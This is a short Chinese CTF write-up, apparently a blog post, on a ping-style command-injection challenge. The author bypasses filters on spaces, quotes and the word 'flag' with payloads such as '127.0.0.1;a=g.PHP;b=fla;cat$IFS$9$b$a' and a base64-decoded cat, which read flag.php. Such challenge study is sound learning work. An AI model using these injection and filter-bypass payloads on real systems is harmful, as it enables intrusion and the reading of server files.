非常简单的页面
看题目 猜到可能是用命令执行 比如 ping 127.0.0.1;ls
不会这么简单吧 不会吧 不会吧
操
怀疑是被脚本 控制了 不让用cat
fuzz 手动测 惨
把flag.PHP 过滤了
空格 也过滤 了
{} 也过滤了
只好拼接
%都过滤 是人么
有可能是 黑名单
构造 a=c;b=at;c=fl;d=ag;$a$b$IFS$9$c$d.PHP
说明服务端用了正则过滤 flag
只能编码解码绕过了
因为空格只放了 $IFS$9 难受
构造 cat$IFS$9`echo$IFS$9"ZmxhZy5waHA="|base64$IFS$9-d`
双引号过滤 了 单引号也是 离谱
`也过滤了 结束了
之前 想盲打 忘记搞index.PHP了 它没做什么过滤
和之前祥云杯的好像啊
主要是 他把""都过滤了
e...看了看wp 还是拼接 不过是换了下顺序绕过 匹配到的flag
之前看过好像 忘了
构造 127.0.0.1;a=g.PHP;b=fla;cat$IFS$9$b$a
还以为失败了 结果
感觉之前 我好像也找到了 白页 应该是假的 `过滤了
再试试
1;cat$IFS$9`echo$IFS$9ZmxhZy5waHA=|base64$IFS$9-d`
可以过 操
刚才做出来了 显示个白页 以为错了 跑去看wp 难受 不过没关系 啊 不看wp 我可能还想不起来 打乱顺序绕preg正则匹配
多积累方法总是好的
想到过 直接用 cat 打开所有文件 但是 不知道语法 可惜
试试
$IFS$x x为任何数字好像都行
前 2个应该都行 第三个因为过滤了 双引号 失效
over
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。